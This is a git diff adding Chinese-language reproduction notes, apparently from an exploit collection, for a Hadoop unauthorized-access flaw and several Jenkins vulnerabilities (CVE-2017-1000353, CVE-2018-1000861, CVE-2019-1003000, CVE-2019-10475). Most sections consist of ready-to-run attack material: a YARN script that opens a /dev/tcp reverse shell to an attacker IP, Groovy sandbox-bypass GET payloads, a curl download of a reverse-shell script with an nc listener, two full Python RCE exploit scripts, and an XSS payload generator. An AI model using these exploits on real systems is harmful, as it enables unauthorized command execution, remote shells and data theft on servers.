add Jenkins

06-Hadoop/Hadoop未授权访问/Hadoop未授权访问.md

@@ -0,0 +1,95 @@
+Hadoop未授权访问
+================
+
+一、漏洞简介
+------------
+
+> Hadoop是一款由Apache基金会推出的分布式系统框架，它通过著名的 MapReduce
+> 算法进行分布式处理。这个框架被Adobe，Last
+> fm，EBay，Yahoo等知名公司使用着。它极大地精简化程序员进行分布式计算时所需的操作，用户大概通过如下步骤在hadoop中实现分布式处理：
+
+-   用户创建一个处理键值的map函数
+
+-   产生了一套中间键/值
+
+-   reduce函数合并中间值并把他们关联到对应的键
+
+二、影响范围
+------------
+
+三、复现过程
+------------
+
+#### 1. 扫描探测
+
+##### 1.1 常见端口
+
+![](./resource/Hadoop未授权访问/media/rId26.png)
+
+##### 1.2 敏感端口
+
+  模块        节点                     默认端口
+  ----------- ------------------------ ----------
+  HDFS        NameNode                 50070
+  HDFS        SecondNameNode           50090
+  HDFS        DataNode                 50075
+  HDFS        Backup/Checkpoint node   50105
+  MapReduce   JobTracker               50030
+  MapReduce   TaskTracker              50060
+
+通过访问 NameNode WebUI 管理界面的 50070
+端口，可以下载任意文件。而且，如果 DataNode 的默认端口 50075
+开放，攻击者可以通过 HDSF 提供的 restful API 对 HDFS
+存储的数据进行操作。
+
+![](./resource/Hadoop未授权访问/media/rId28.png)
+
+#### 2. 攻击手法
+
+利用方法和原理中有一些不同。在没有 hadoop client 的情况下，直接通过 REST
+API 也可以提交任务执行。
+
+利用过程如下：
+
+-   在本地监听等待反弹 shell 连接
+
+-   调用 New Application API 创建 Application
+
+-   调用 Submit Application API 提交
+
+**P牛的攻击脚本**
+
+    ##!/usr/bin/env python
+
+    import requests
+
+    target = 'http://127.0.0.1:8088/'
+    lhost = '192.168.0.1' ## put your local host ip here, and listen at port 9999
+
+    url = target + 'ws/v1/cluster/apps/new-application'
+    resp = requests.post(url)
+    app_id = resp.json()['application-id']
+    url = target + 'ws/v1/cluster/apps'
+    data = {
+        'application-id': app_id,
+        'application-name': 'get-shell',
+        'am-container-spec': {
+            'commands': {
+                'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
+            },
+        },
+        'application-type': 'YARN',
+    }
+    requests.post(url, json=data)
+
+![](./resource/Hadoop未授权访问/media/rId30.png)
+
+#### 3. 防范措施
+
+网络访问控制 使用 安全组防火墙 或本地操作系统防火墙对访问源 IP
+进行控制。如果您的 Hadoop 环境仅对内网服务器提供服务，建议不要将 Hadoop
+服务所有端口发布到互联网。
+
+启用认证功能 启用 Kerberos 认证功能。
+
+更新补丁 不定期关注 Hadoop 官方发布的最新版本，并及时更新补丁。

07-Jenkins/Jenkins 功能未授权访问导致的远程命令执行漏洞/Jenkins 功能未授权访问导致的远程命令执行漏洞.md

@@ -0,0 +1,33 @@
+Jenkins功能未授权访问导致的远程命令执行漏洞
+===========================================
+
+一、漏洞简介
+------------
+
+Jenkins管理登陆之后，后台"系统管理"功能，有个"脚本命令行的"功能，它的作用是执行用于管理或故障探测或诊断的任意脚本命令，利用该功能，可以执行系统命令，该功能实际上Jenkins正常的功能，由于很多管理账号使用了弱口令，或者管理后台存在未授权访问，导致该功能会对Jenkins系统服务器产生比较严重的影响和危害。
+
+二、漏洞影响
+------------
+
+三、复现过程
+------------
+
+找到"系统管理"------"脚本命令行"。
+
+![](./resource/Jenkins功能未授权访问导致的远程命令执行漏洞/media/rId24.png)
+
+![](./resource/Jenkins功能未授权访问导致的远程命令执行漏洞/media/rId25.png)
+
+输入任意的Groovy脚本并在服务器上执行它。对于故障排除和诊断很有用。使用'println'命令查看输出（如果使用System.out，它将输出到服务器的标准输出，很难看到。）示例：
+
+    println(Jenkins.instance.pluginManager.plugins)
+
+在脚本命令行中输入下面的语句，即可执行相应的命令：
+
+    println "whoami".execute().text
+
+![](./resource/Jenkins功能未授权访问导致的远程命令执行漏洞/media/rId26.png)
+
+    println "ifconfig".execute().text
+
+image

07-Jenkins/（CVE-2017-1000353）Jenkins-CI 远程代码执行漏洞/（CVE-2017-1000353）Jenkins-CI 远程代码执行漏洞.md

@@ -0,0 +1,42 @@
+（CVE-2017-1000353）Jenkins-CI 远程代码执行漏洞
+===============================================
+
+一、漏洞简介
+------------
+
+该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中，Jenkins利用此通道来接收命令，恶意攻击者可以构造恶意攻击参数远程执行命令，从而获取系统权限，造成数据泄露。
+
+二、漏洞影响
+------------
+
+所有Jenkins主版本均受到影响(包括\<=2.56版本)所有Jenkins LTS 均受到影响( 包括\<=2.46.1版本)
+
+三、复现过程
+------------
+
+### 步骤一、生成序列化字符串
+
+参考<https://github.com/ianxtianxt/CVE-2017-1000353>，首先下载[CVE-2017-1000353-1.1-SNAPSHOT-all.jar](https://github.com/ianxtianxt/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar)，这是生成POC的工具。
+
+执行下面命令，生成字节码文件：
+
+    java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
+    # jenkins_poc.ser是生成的字节码文件名
+    # "touch ..."是待执行的任意命令
+
+执行上述代码后，生成jenkins\_poc.ser文件，这就是序列化字符串。
+
+### 步骤二、发送数据包，执行命令
+
+下载[exploit.py](https://github.com/ianxtianxt/CVE-2017-1000353/blob/master/exploit.py)，python3执行`python exploit.py http://www.0-sec.org:8080 jenkins_poc.ser`，将刚才生成的字节码文件发送给目标：
+
+![1.jpg](./resource/(CVE-2017-1000353)Jenkins-CI远程代码执行漏洞/media/rId29.jpg)
+
+进入docker，发现`/tmp/success`成功被创建，说明命令执行漏洞利用成功：
+
+![2.jpg](./resource/(CVE-2017-1000353)Jenkins-CI远程代码执行漏洞/media/rId30.jpg)
+
+参考链接
+--------
+
+> https://vulhub.org/\#/environments/jenkins/CVE-2017-1000353/

07-Jenkins/（CVE-2018-1000861）Jenkins 远程命令执行漏洞/（CVE-2018-1000861）Jenkins 远程命令执行漏洞.md

@@ -0,0 +1,198 @@
+（CVE-2018-1000861）Jenkins 远程命令执行漏洞
+============================================
+
+一、漏洞简介
+------------
+
+Jenkins使用Stapler框架开发，其允许用户通过URL
+PATH来调用一次public方法。由于这个过程没有做限制，攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。
+
+通过这个漏洞，我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令：Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误，检查操作是没有沙盒的，攻击者可以通过Meta-Programming的方式，在检查这个步骤时执行任意命令。
+
+二、漏洞影响
+------------
+
+Jenkins Version \<= 2.56
+
+Jenkins LTS Version \<= 2.46.1
+
+三、复现过程
+------------
+
+#### 漏洞复现:
+
+##### 1.此漏洞是没有回显的,所以我们这里直接反弹shell:
+
+此漏洞的POC(直接GET请求即可):
+
+    GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20{public%20x(){%22touch%20/tmp/CVE-2018-1000861_is_success%22.execute()}}
+
+##### 2.我们这里采取下载文件的方法来反弹shell
+
+\(1\) 先在我们的服务器上防止一个文本,内容为:
+
+    bash -i >& /dev/tcp/172.26.1.156/9999 0>&1
+
+\(2\) 然后我们替换POC中执行命令的部分为下载文件的命令:
+
+    curl -o /tmp/1.sh http://172.26.1.156:8080/1.txt
+
+替换后的POC:
+
+    http://172.26.1.129:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20{public%20x(){%22curl+-o+/tmp/1.sh+http://172.26.1.156:8080/1.txt%22.execute()}}
+
+\(3\) 给予下载的脚本执行权限:
+
+    chmod 777 /tmp/1.sh
+
+替换后的POC:
+
+    http://172.26.1.129:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20{public%20x(){%22chmod+777+/tmp/1.sh%22.execute()}}
+
+\(4\) 然后在我们接收shell的机器上监听之前写的端口:
+
+    nc -lvvp 9999
+
+\(5\) 直接bash执行我们下载的脚本
+
+    bash /tmp/1.sh
+
+替换后的POC:
+
+    http://172.26.1.129:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20{public%20x(){%22bash+/tmp/1.sh%22.execute()}}
+
+\(6\) 回到我们监听端口的机器:
+
+![U1fa800f6a04448f38d05166dcce9d04cJ.jpg](./resource/(CVE-2018-1000861)Jenkins远程命令执行漏洞/media/rId27.jpg)
+
+可以看到已经成功获取到了shell!
+
+### poc
+
+**useage**
+
+    $ curl -s -I http://jenkins/| grep X-Jenkins
+    X-Jenkins: 2.137
+    X-Jenkins-Session: 20f72c2e
+    X-Jenkins-CLI-Port: 50000
+    X-Jenkins-CLI2-Port: 50000
+
+    $ python exp.py http://jenkins/ 'curl orange.tw'
+    [*] ANONYMOUS_READ disable!
+    [*] Bypass with CVE-2018-1000861!
+    [*] Exploit success!(it should be :P)
+
+![Uadc7abd83e45466dbed2f51492676c13j.jpg](./resource/(CVE-2018-1000861)Jenkins远程命令执行漏洞/media/rId29.jpg)
+
+    #!/usr/bin/python
+    # coding: UTF-8
+    # author: Orange Tsai(@orange_8361)
+    # 
+
+    import sys
+    import requests
+    from enum import Enum
+
+    # remove bad SSL warnings
+    try:
+        requests.packages.urllib3.disable_warnings()
+    except:
+        pass
+
+
+    endpoint = 'descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript'
+
+    class mode(Enum):
+        ACL_PATCHED = 0
+        NOT_JENKINS = 1
+        READ_ENABLE = 2
+        READ_BYPASS = 3
+        ENTRY_NOTFOUND = 999
+
+    def usage():
+        print '''
+      Usage:
+        python exp.py <url> <cmd>
+        '''
+
+    def _log(msg, fail=False):
+        nb = '[*]'
+        if fail:
+            nb = '[-]'
+        print '%s %s' % (nb, msg)
+
+    def _get(url, params=None):
+        r = requests.get(url, verify=False, params=params)
+        return r.status_code, r.content
+
+    def _add_bypass(url):
+        return url + 'securityRealm/user/admin/'
+
+    def check(url):
+        flag, accessible = mode.ACL_PATCHED, False
+
+        # check ANONYMOUS_READ
+        status, content = _get(url)
+        if status == 200 and 'adjuncts' in content:
+            flag, accessible = mode.READ_ENABLE, True
+            _log('ANONYMOUS_READ enable!')
+        elif status == 403:
+            _log('ANONYMOUS_READ disable!')
+
+            # check ACL bypass, CVE-2018-1000861
+            status, content = _get(_add_bypass(url))
+            if status == 200 and 'adjuncts' in content:
+                flag, accessible = mode.READ_BYPASS, True
+        else:
+            flag = mode.NOT_JENKINS
+
+        # check entry point, CVE-2019-1003005
+        if accessible:
+            if flag is mode.READ_BYPASS:
+                url = _add_bypass(url)
+            status, content = _get(url + endpoint)
+
+            if status == 404:
+                flag = mode.ENTRY_NOTFOUND
+
+        return flag
+
+    def exploit(url, cmd):
+        payload = 'public class x{public x(){new String("%s".decodeHex()).execute()}}' % cmd.encode('hex')
+        params = {
+            'sandbox': True, 
+            'value': payload
+        }
+
+        status, content = _get(url + endpoint, params)
+        if status == 200:
+            _log('Exploit success!(it should be :P)')
+        elif status == 405:
+            _log('It seems Jenkins has patched the RCE gadget :(')
+        else:
+            _log('Exploit fail with HTTP status [%d]' % status, fail=True)
+            if 'stack trace' in content:
+                for _ in content.splitlines():
+                    if _.startswith('Caused:'):
+                        _log(_, fail=True)
+
+    if __name__ == '__main__':
+        if len(sys.argv) != 3:
+            usage()
+            exit()
+
+        url = sys.argv[1].rstrip('/') + '/'
+        cmd = sys.argv[2]
+
+        flag = check(url)
+        if flag is mode.ACL_PATCHED:
+            _log('It seems Jenkins is up-to-date(>2.137) :(', fail=True)
+        elif flag is mode.NOT_JENKINS:
+            _log('Is this Jenkins?', fail=True)
+        elif flag is mode.READ_ENABLE:
+            exploit(url, cmd)
+        elif flag is mode.READ_BYPASS:
+            _log('Bypass with CVE-2018-1000861!')
+            exploit(_add_bypass(url), cmd)
+        else:
+            _log('The `checkScript` is not found, please try other entries(see refs)', fail=True)

07-Jenkins/（CVE-2019-1003000）Jenkins 远程代码执行漏洞/（CVE-2019-1003000）Jenkins 远程代码执行漏洞.md

@@ -0,0 +1,122 @@
+（CVE-2019-1003000）Jenkins 远程代码执行漏洞
+============================================
+
+一、漏洞简介
+------------
+
+该漏洞存在于Declarative Plugin 1.3.4.1之前的版本, Groovy Plugin
+2.61.1之前的版本以及 Script Security Plugin
+1.50之前的版本。该漏洞通过将AST转换注释（如\@Grab）应用于源代码元素，可以在脚本编译阶段避免脚本安全沙箱保护。所以会造成具有"Overall/Read"权限的用户或能够控制SCM中的Jenkinsfile或者sandboxed
+Pipeline共享库内容的用户可以绕过沙盒保护并在Jenkins主服务器上执行任意代码。
+
+二、漏洞影响
+------------
+
+Declarative Plugin \< 1.3.4.1
+
+Groovy Plugin \< 2.61.1
+
+Script Security Plugin \< 1.50
+
+三、复现过程
+------------
+
+### 环境搭建
+
+    gitclone https://github.com/ianxtianxt/cve-2019-1003000-jenkins-rce-poc.git
+
+    cdcve-2019-1003000-jenkins-rce-poc
+
+    pipinstall -r requirements.txt
+
+    cdsample-vuln
+
+    ./run.sh
+
+**输入账号密码user1:user1**
+
+![](./resource/(CVE-2019-1003000)Jenkins远程代码执行漏洞/media/rId25.png)
+
+***\*poc进行攻击pythonexploit.py --url http://www.0-sec.org:8080 --job
+my-pipeline --usernameuser1 --password user1 --cmd "whoami"\****
+
+![](./resource/(CVE-2019-1003000)Jenkins远程代码执行漏洞/media/rId26.png)
+
+![](./resource/(CVE-2019-1003000)Jenkins远程代码执行漏洞/media/rId27.png)
+
+### poc
+
+    #!/usr/bin/python
+
+    # Author: Adam Jordan
+    # Date: 2019-02-15
+    # Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
+    # PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)
+
+
+    import argparse
+    import jenkins
+    import time
+    from xml.etree import ElementTree
+
+    payload = '''
+    import org.buildobjects.process.ProcBuilder
+    @Grab('org.buildobjects:jproc:2.2.3')
+    class Dummy{ }
+    print new ProcBuilder("/bin/bash").withArgs("-c","%s").run().getOutputString()
+    '''
+
+
+    def run_command(url, cmd, job_name, username, password):
+        print '[+] connecting to jenkins...'
+        server = jenkins.Jenkins(url, username, password)
+
+        print '[+] crafting payload...'
+        ori_job_config = server.get_job_config(job_name)
+        et = ElementTree.fromstring(ori_job_config)
+        et.find('definition/script').text = payload % cmd
+        job_config = ElementTree.tostring(et, encoding='utf8', method='xml')
+
+        print '[+] modifying job with payload...'
+        server.reconfig_job(job_name, job_config)
+        time.sleep(3)
+
+        print '[+] putting job build to queue...'
+        queue_number = server.build_job(job_name)
+        time.sleep(3)
+
+        print '[+] waiting for job to build...'
+        queue_item_info = {}
+        while 'executable' not in queue_item_info:
+            queue_item_info = server.get_queue_item(queue_number)
+            time.sleep(1)
+
+        print '[+] restoring job...'
+        server.reconfig_job(job_name, ori_job_config)
+        time.sleep(3)
+
+        print '[+] fetching output...'
+        last_build_number = server.get_job_info(job_name)['lastBuild']['number']
+        console_output = server.get_build_console_output(job_name, last_build_number)
+
+        print '[+] OUTPUT:'
+        print console_output
+
+
+    if __name__ == '__main__':
+        parser = argparse.ArgumentParser(description='Jenkins RCE')
+
+        parser.add_argument('--url', help='target jenkins url')
+        parser.add_argument('--cmd', help='system command to be run')
+        parser.add_argument('--job', help='job name')
+        parser.add_argument('--username', help='username')
+        parser.add_argument('--password', help='password')
+
+        args = parser.parse_args()
+
+        run_command(args.url, args.cmd, args.job, args.username, args.password)
+
+参考链接
+--------
+
+> https://www.freebuf.com/column/197026.html

07-Jenkins/（CVE-2019-10475）反射xss/（CVE-2019-10475）反射xss.md

@@ -0,0 +1,79 @@
+（CVE-2019-10475） 插件反射型xss
+================================
+
+一、漏洞简介
+------------
+
+二、漏洞影响
+------------
+
+360 FireLine插件， 最高包括1.7.2 Bitbucket OAuth插件， 最高包括0.9
+Build-metrics插件 1.3及以下 部署WebLogic Plugin 最高至4.1
+Dynatrace应用程序监视插件， 最高包括2.1.3 Dynatrace应用程序监视插件，
+最高包括2.1.4 ElasticBox Jenkins Kubernetes CI / CD插件， 最高至1.3
+包含1.1.4及以下版本的 全局Post Script插件 Libvirt Slaves插件，
+最高包括1.8.5 截至 2.7.0的 Mattermost Notification插件 Sonar
+Gerrit插件， 最高包括2.3 Zulip插件 （包括1.1.0及以下）
+
+三、复现过程
+------------
+
+### 1、手工复现
+
+该vulnearble插件位于[http://localhost:8080/plugin/build-metrics/，漏洞参数为label。](http://localhost:8080/plugin/build-metrics/，漏洞参数为label。)
+
+    http://192.168.1.75:8080/plugin/build-metrics/getBuildStats?label=<script>alert("CVE-2019-10475")</script>&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search
+
+![](./resource/(CVE-2019-10475)反射xss/media/rId26.png)
+
+### 2、利用脚本
+
+    #!/usr/bin/env python
+
+    import sys
+    import argparse
+
+    VULN_URL = '''{base_url}/plugin/build-metrics/getBuildStats?label={inject}&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search'''
+
+
+    def get_parser():
+        parser = argparse.ArgumentParser(description='CVE-2019-10475')
+        parser.add_argument('-p', '--port', help='port', default=80, type=int)
+        parser.add_argument('-d', '--domain', help='domain', default='localhost', type=str)
+        parser.add_argument('-i', '--inject', help='inject', default='<script>alert("CVE-2019-10475")</script>', type=str)
+        return parser
+
+
+    def main():
+        parser = get_parser()
+        args = vars(parser.parse_args())
+        port = args['port']
+        domain = args['domain']
+        inject = args['inject']
+        if port == 80:
+            base_url = f'http://{domain}'
+        elif port == 443:
+            base_url = f'https://{domain}'
+        else:
+            base_url = f'http://{domain}:{port}'
+        build_url = VULN_URL.format(base_url=base_url, inject=inject)
+        print(build_url)
+        return 0
+
+
+    if __name__ == '__main__':
+        sys.exit(main())
+    Usage:
+
+    $ python3 CVE-2019-10475.py --help
+    usage: CVE-2019-10475.py [-h] [-p PORT] [-d DOMAIN] [-i INJECT]
+
+    CVE-2019-10475
+
+    optional arguments:
+      -h, --help            show this help message and exit
+      -p PORT, --port PORT  port
+      -d DOMAIN, --domain DOMAIN
+                            domain
+      -i INJECT, --inject INJECT
+                            injec